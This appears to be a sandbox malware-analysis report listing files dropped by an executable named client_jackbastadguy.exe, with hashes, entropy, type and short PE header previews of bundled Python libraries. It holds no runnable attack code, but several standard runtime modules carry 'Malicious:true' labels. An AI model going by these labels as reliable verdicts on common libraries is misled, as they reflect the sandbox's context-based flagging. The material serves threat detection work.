                                                                                                                                                                                                                                                  Size (bytes):15360
                                                                                                                                                                                                                                                  Entropy (8bit):5.243633265407984
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:QUN0iKNb3NuUPyxfFNhoCoK7e+TcBXJ2kMQ75i6nElDLUH:dYz8JpF39oK6+QBXJ2k775NKU
                                                                                                                                                                                                                                                  MD5:57A49AC595084A19516C64079EE1A4C7
                                                                                                                                                                                                                                                  SHA1:4B188D0E9965AB0DA8D9363FC7FEEE737DF81F74
                                                                                                                                                                                                                                                  SHA-256:D7DA3DC02AC4685D3722E5AF63CA1A8857D53454D59CF64C784625D649897D72
                                                                                                                                                                                                                                                  SHA-512:693989D01070835DC9D487C904F012EE5BE72219E1EEAEC56EE3BC35659192714D8F538BEA30F4849B3A3D4BCF24705EDFE84AD2742F6C8562F6C6215F7917BE
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...[."`.........." ..... ..........T.....................................................`..........................................8.......9..d....`.......P..d............p..$...p2...............................2..8............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......2..............@....pdata..d....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..$....p.......:..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_poly1305.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):14848
                                                                                                                                                                                                                                                  Entropy (8bit):5.253962925838046
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:t39lJPKBb3+ujPH/41fPnVSEsV3+ldpCArU8vOjpDLUFDdA:V9wzdz/afPCV3YdjdvMUFpA
                                                                                                                                                                                                                                                  MD5:C19895CE6ABC5D85F63572308BD2D403
                                                                                                                                                                                                                                                  SHA1:6B444E59112792B59D3BA4F304A30B62EEBD77FA
                                                                                                                                                                                                                                                  SHA-256:1BCA3479A4CC033E8BC3B4DD8DCC531F38E7B7FE650A7DA09120CCAC100D70A4
                                                                                                                                                                                                                                                  SHA-512:D8D493D51DE052F2A0BB18C4CD6F5E15AB5D5CCB3276D38DDA44382746656618560878359D6C95A76B223CBD4B2CD39C817EC7FC3108EED5D541CF4BD95AAA14
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...\."`.........." ................T.....................................................`..........................................8......h9..d....`.......P..|............p..$....1...............................1..8............0...............................text............................... ..`.rdata.......0......."..............@..@.data........@.......0..............@....pdata..|....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..$....p.......8..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Math\_modexp.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):5.913715253597897
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:4ea6OoLEx/fpMgEXNSNk/IppSQDLw16UADNIz7Izy+3O3nCpDN+cGJVtV81UpSu8:44OoMpMgqSpz41ht7EOeYcUV4ipwr
                                                                                                                                                                                                                                                  MD5:150F31A18FDCCB30695E8A11B844CB9A
                                                                                                                                                                                                                                                  SHA1:85A333C8A866AAFBF6B3766CED0B7079A2358C42
                                                                                                                                                                                                                                                  SHA-256:D26D543EFC9A6C3D5BA52FFC55965A2C3DBB7E634776EF6C1789E5DF8E4DF3E5
                                                                                                                                                                                                                                                  SHA-512:DDFE93CBE315E060A8F0B3863A1675D8F156BF84F157CD7BCBD7EC57F88C72DD21E6C2A5077A142D828DAD0C40149EE4064C34E6EE26787A8B32D4AC9A18E1CA
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........P.R.>.R.>.R.>.[...V.>..?.P.>.F.?.Q.>.R.?.{.>..;.Y.>..:.Z.>..=.Q.>..6.V.>..>.S.>....S.>..<.S.>.RichR.>.........PE..d...i."`.........." .....V...,............................................................`..........................................~..d.......d...............T...............$....q...............................q..8............p..(............................text...(U.......V.................. ..`.rdata.......p.......Z..............@..@.data...H............n..............@....pdata..T............t..............@..@.rsrc................|..............@..@.reloc..$............~..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Protocol\_scrypt.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                                                                  Entropy (8bit):4.725087774300977
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:N942/KIb3bu95Pp2abc64uVNn4DLUOVdB:FJzCxl464aGUOf
                                                                                                                                                                                                                                                  MD5:66052F3B3D4C48E95377B1B827B959BB
                                                                                                                                                                                                                                                  SHA1:CF3F0F82B87E67D75B42EAAB144AE7677E0C882E
                                                                                                                                                                                                                                                  SHA-256:C9A6A7D7CE0238A8D03BCC1E43FD419C46FAEA3E89053355199DEDF56DADAFA4
                                                                                                                                                                                                                                                  SHA-512:9A7F45CE151890032574ED1EF8F45640E489987DC3AF716E5D7F31127BA3675E1F4C775229184C52D9A3792DF9CB2B3D0D3BE079192C40E900BA0CC69E8E3EE5
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........./...A...A...A.......A.@.@...A...@...A...@..A.@.D...A.@.E...A.@.B...A.f.I...A.f.A...A.f....A.f.C...A.Rich..A.........................PE..d...b."`.........." ................T.....................................................`.........................................P8..d....8..d....`.......P..4............p..$....1...............................1..8............0...............................text...X........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..$....p......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\PublicKey\_ec_ws.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):748032
                                                                                                                                                                                                                                                  Entropy (8bit):7.627003962799197
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:b3HtKHoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h:b3NKHoxJFf1p34hcrn5Go9yQO6
                                                                                                                                                                                                                                                  MD5:B96D4854F02D932D9D84DB7CE254C85A
                                                                                                                                                                                                                                                  SHA1:61F8F284EEB65B21A5373DA85270802B9E0ABBF4
                                                                                                                                                                                                                                                  SHA-256:E73BC5D362A1439FD87BF3901D5B2D4534B50E3B935C841F25D3C49BF3D4D7EE
                                                                                                                                                                                                                                                  SHA-512:1FDE226034F48B29143E1B3042FB42C91BE8DE5DDC53B2F2FA3DAB1CCA99FB34AF3A8FB57B0CB5B152943BE156B4521DAE04FB80B08EC04A3F371E30D137297A
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j.2...a...a...a.sba...alz.`...a.`.`...a...a...alz.`...alz.`...alz.`...aJy.`...aJy.`...aJy.a...aJy.`...aRich...a........................PE..d...g."`.........." .....V................................................................`.........................................p_.......a..d...............H...............0....H...............................I..8............p..(............................text....T.......V.................. ..`.rdata.......p.......Z..............@..@.data...X....p.......P..............@....pdata..H............X..............@..@.rsrc................f..............@..@.reloc..0............h..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Util\_cpuid_c.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                                  Entropy (8bit):4.662736103035243
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:5y8MdJTCaDAH37Belrzu1x/r8qJ7pfJsPG6Q9qHaGi0oYAsDJ9UqvA:0TdJTlDmNelrzuLFf0Qd03DLU
                                                                                                                                                                                                                                                  MD5:E17F1BA35CF28FA1DDA7B1EC29573E0E
                                                                                                                                                                                                                                                  SHA1:6EB63305E38BD75931E3325E0C3F58F7CB3F2AD0
                                                                                                                                                                                                                                                  SHA-256:D37CCB530F177F3E39C05B0CA0A70661B2541CCAF56818DAD4FCF336EEED3321
                                                                                                                                                                                                                                                  SHA-512:8E7AF8712592084178E3B93FE54E60AC32A774D151896AFEE937CDB3BB9F629F4B597F85AF9B56A1C14612121357FC0DDAA45E71D91B13C36E88292D3050A1B9
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........mr..............t......,}.......g..............,}......,}......,}.......~.......~.......~.......~......Rich............................PE..d...`."`.........." ................T........................................p............`..........................................'..|...|'..P....P.......@...............`..$....!...............................!..8............ ...............................text............................... ..`.rdata..H.... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....`.......&..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Util\_strxor.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                                  Entropy (8bit):4.620728904455609
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:5Z8MdJTCaDAH37Belrzu1x/r8qJ7pfJsPG6QgcfPPYdsDJ9UKvb:nTdJTlDmNelrzuLFf0Q5P3DLU
                                                                                                                                                                                                                                                  MD5:3369F9BB8B0EE93E5AD5B201956DC60F
                                                                                                                                                                                                                                                  SHA1:A5B75CBD6CE905A179E49888E798CD6AE9E9194D
                                                                                                                                                                                                                                                  SHA-256:5940E97E687A854E446DC859284A90C64CF6D87912C37172B8823A8C3A7B73DF
                                                                                                                                                                                                                                                  SHA-512:C4E71D683BE64A8E6AB533FA4C1C3040B96D0BE812EA74C99D2D2B5D52470C24B45D55366A7ACB9D8CDA759A618CBAF0D0A7ECFEF4C0954DF89FDB768D9893E2
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........mr..............t......,}.......g..............,}......,}......,}.......~.......~.......~.......~......Rich............................PE..d...b."`.........." ................T........................................p............`..........................................&..t...d'..P....P.......@...............`..$....!...............................!..8............ ...............................text...x........................... ..`.rdata..0.... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....`.......&..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\VCRUNTIME140.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):98736
                                                                                                                                                                                                                                                  Entropy (8bit):6.474996871326343
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
                                                                                                                                                                                                                                                  MD5:F12681A472B9DD04A812E16096514974
                                                                                                                                                                                                                                                  SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
                                                                                                                                                                                                                                                  SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
                                                                                                                                                                                                                                                  SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\_asyncio.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):64424
                                                                                                                                                                                                                                                  Entropy (8bit):6.124000794465739
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:r/p7Wh7XUagO7BR4SjavFHx8pIS5nWQ7Sy7o:r/tWhzUahBR4Sjahx8pIS5n5Fo
                                                                                                                                                                                                                                                  MD5:6EB3C9FC8C216CEA8981B12FD41FBDCD
                                                                                                                                                                                                                                                  SHA1:5F3787051F20514BB9E34F9D537D78C06E7A43E6
                                                                                                                                                                                                                                                  SHA-256:3B0661EF2264D6566368B677C732BA062AC4688EF40C22476992A0F9536B0010
                                                                                                                                                                                                                                                  SHA-512:2027707824D0948673443DD54B4F45BC44680C05C3C4A193C7C1803A1030124AD6C8FBE685CC7AAF15668D90C4CD9BFB93DE51EA8DB4AF5ABE742C1EF2DCD08B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&.~[b...b...b...k..`.......`.......n.......j.......a.......a.......`...b..........c.......c.......c.......c...Richb...........PE..d....K.b.........." ... .T..........`...............................................^.....`.............................................P...P...d........................)...........w..T...........................@v..@............p.. ............................text....R.......T.................. ..`.rdata...I...p...J...X..............@..@.data...(...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\_bz2.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):83368
                                                                                                                                                                                                                                                  Entropy (8bit):6.530099411242372
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:asRz7qNFcaO6ViD4fhaLRFc/a8kd7jzWHCxIStVs7Sywk:9RzGYYhaY9kd7jzWixIStVs+k
                                                                                                                                                                                                                                                  MD5:A4B636201605067B676CC43784AE5570
                                                                                                                                                                                                                                                  SHA1:E9F49D0FC75F25743D04CE23C496EB5F89E72A9A
                                                                                                                                                                                                                                                  SHA-256:F178E29921C04FB68CC08B1E5D1181E5DF8CE1DE38A968778E27990F4A69973C
                                                                                                                                                                                                                                                  SHA-512:02096BC36C7A9ECFA1712FE738B5EF8B78C6964E0E363136166657C153727B870A6A44C1E1EC9B81289D1AA0AF9C85F1A37B95B667103EDC2D3916280B6A9488
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........{..{..{...#.{......{....M.{......{......{......{......{..Z...{..{...{......{......{....O.{......{..Rich.{..........PE..d....K.b.........." ... .....^..............................................P......& ....`.........................................p...H............0....... .. ........)...@..........T...........................p...@............................................text...O........................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\_cffi_backend.cp310-win_amd64.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):178176
                                                                                                                                                                                                                                                  Entropy (8bit):6.160618368535074
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:a28mc0wlApJaPh2dEVWkS0EDejc2zSTBcS7EkSTLkKDtJbtb:axTlApohBV1S0usWchkSTLLDDt
                                                                                                                                                                                                                                                  MD5:2BAAA98B744915339AE6C016B17C3763
                                                                                                                                                                                                                                                  SHA1:483C11673B73698F20CA2FF0748628C789B4DC68
                                                                                                                                                                                                                                                  SHA-256:4F1CE205C2BE986C9D38B951B6BCB6045EB363E06DACC069A41941F80BE9068C
                                                                                                                                                                                                                                                  SHA-512:2AE8DF6E764C0813A4C9F7AC5A08E045B44DAAC551E8FF5F8AA83286BE96AA0714D373B8D58E6D3AA4B821786A919505B74F118013D9FCD1EBC5A9E4876C2B5F
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#...p...p...p...p...p.y.q...p.y{p...p.y.q...p.y.q...p.y.q...p.q...pi..q...p...pX..p.x.q...p...p...p.x.q...p.xyp...p.x.q...pRich...p................PE..d......f.........." ...).....B.............................................. ............`.........................................PX..l....X.......................................?...............................=..@............................................text............................... ..`.rdata..............................@..@.data....].......0...j..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\_ctypes.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):122792
                                                                                                                                                                                                                                                  Entropy (8bit):6.021506515932983
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:bsQx9bm+edYe3ehG+20t7MqfrSW08UficVISQPkFPR:QQxCOhGB0tgqfrSiUficrZ
                                                                                                                                                                                                                                                  MD5:87596DB63925DBFE4D5F0F36394D7AB0
                                                                                                                                                                                                                                                  SHA1:AD1DD48BBC078FE0A2354C28CB33F92A7E64907E
                                                                                                                                                                                                                                                  SHA-256:92D7954D9099762D81C1AE2836C11B6BA58C1883FDE8EEEFE387CC93F2F6AFB4
                                                                                                                                                                                                                                                  SHA-512:E6D63E6FE1C3BD79F1E39CB09B6F56589F0EE80FD4F4638002FE026752BFA65457982ADBEF13150FA2F36E68771262D9378971023E07A75D710026ED37E83D7B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T....ne..ne..ne......ne.p.d..ne.p.`..ne.p.a..ne.p.f..ne.t.d..ne...a..ne...d..ne...d..ne..nd..ne.t.h..ne.t.e..ne.t....ne.t.g..ne.Rich.ne.........PE..d....K.b.........." ... ............P[..............................................H.....`..........................................Q.......R...........................).......... ...T...............................@...............@............................text............................... ..`.rdata..nl.......n..................@..@.data...D>...p...8...^..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\_decimal.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):250280
                                                                                                                                                                                                                                                  Entropy (8bit):6.547354352688139
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:TogRj7JKM8c7N6FiFUGMKa3xB6Dhj9qWMa3pLW1A64WsqC:tPJKa7N6FEa3x4NlbqC
                                                                                                                                                                                                                                                  MD5:10F7B96C666F332EC512EDADE873EECB
                                                                                                                                                                                                                                                  SHA1:4F511C030D4517552979105A8BB8CCCF3A56FCEA
                                                                                                                                                                                                                                                  SHA-256:6314C99A3EFA15307E7BDBE18C0B49BC841C734F42923A0B44AAB42ED7D4A62D
                                                                                                                                                                                                                                                  SHA-512:CFE5538E3BECBC3AA5540C627AF7BF13AD8F5C160B581A304D1510E0CB2876D49801DF76916DCDA6B7E0654CE145BB66D6E31BD6174524AE681D5F2B49088419
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................7.......................................+.........c.........................[...........Rich...........PE..d....K.b.........." ... .p...:.......................................................^....`..........................................D..P...@E...................'.......)......@...p...T...........................0...@............................................text...]o.......p.................. ..`.rdata...............t..............@..@.data....)...`...$...L..............@....pdata...'.......(...p..............@..@.rsrc...............................@..@.reloc..@...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\_hashlib.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):61864
                                                                                                                                                                                                                                                  Entropy (8bit):6.210920109899827
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:aSz5iGzcowlJF+aSe3kuKUZgL4dqDswE9+B1fpIS5IHYiSyvc9eEdB:npWlJF+aYupZbdqDOgB1fpIS5IH7Sy+V
                                                                                                                                                                                                                                                  MD5:49CE7A28E1C0EB65A9A583A6BA44FA3B
                                                                                                                                                                                                                                                  SHA1:DCFBEE380E7D6C88128A807F381A831B6A752F10
                                                                                                                                                                                                                                                  SHA-256:1BE5CFD06A782B2AE8E4629D9D035CBC487074E8F63B9773C85E317BE29C0430
                                                                                                                                                                                                                                                  SHA-512:CF1F96D6D61ECB2997BB541E9EDA7082EF4A445D3DD411CE6FD71B0DFE672F4DFADDF36AE0FB7D5F6D1345FBD90C19961A8F35328332CDAA232F322C0BF9A1F9
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zD.A>%..>%..>%..7]..:%..^_..<%..^_..2%..^_..6%..^_..=%..Z_..<%...W..<%...\..=%..>%...%..Z_..?%..Z_..?%..Z_..?%..Z_..?%..Rich>%..................PE..d....K.b.........." ... .P...z.......<..............................................Np....`............................................P...@............................)......X....l..T............................k..@............`..(............................text....N.......P.................. ..`.rdata..VM...`...N...T..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\_lzma.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):158120
                                                                                                                                                                                                                                                  Entropy (8bit):6.838169661977938
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:MeORg8tdLRrHn5Xp4znfI9mNoY6JCvyPZxsyTxISe1KmDd:M/Rgo1L5wwYOY6MixJKR
                                                                                                                                                                                                                                                  MD5:B5FBC034AD7C70A2AD1EB34D08B36CF8
                                                                                                                                                                                                                                                  SHA1:4EFE3F21BE36095673D949CCEAC928E11522B29C
                                                                                                                                                                                                                                                  SHA-256:80A6EBE46F43FFA93BBDBFC83E67D6F44A44055DE1439B06E4DD2983CB243DF6
                                                                                                                                                                                                                                                  SHA-512:E7185DA748502B645030C96D3345D75814BA5FD95A997C2D1C923D981C44D5B90DB64FAF77DDBBDC805769AF1BEC37DAF0ECEE0930A248B67A1C2D92B59C250C
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m....................................................<.........................................Rich...........................PE..d....L.b.........." ... .d...........8...............................................p....`.........................................0%..L...|%..x....p.......P.......@...)......H.......T...........................`...@............................................text...^c.......d.................. ..`.rdata..............h..............@..@.data........@......................@....pdata.......P....... ..............@..@.rsrc........p.......4..............@..@.reloc..H............>..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\_multiprocessing.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):33192
                                                                                                                                                                                                                                                  Entropy (8bit):6.3186201273933635
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:Y3I65wgJ5xeSZg2edRnJ8ZISRtczYiSyvZCeEdP:gIgJ5Uqg2edRJ8ZISRtcz7Sy0b
                                                                                                                                                                                                                                                  MD5:71AC323C9F6E8A174F1B308B8C036E88
                                                                                                                                                                                                                                                  SHA1:0521DF96B0D622544638C1903D32B1AFF1F186B0
                                                                                                                                                                                                                                                  SHA-256:BE8269C83666EAA342788E62085A3DB28F81512D2CFA6156BF137B13EBEBE9E0
                                                                                                                                                                                                                                                  SHA-512:014D73846F06E9608525A4B737B7FCCBE2123D0E8EB17301244B9C1829498328F7BC839CC45A1563CF066668EA6E0C4E3A5A0821AB05C999A97C20AA669E9EDA
                                                                                                                                                                                                                                                  Malicious:true
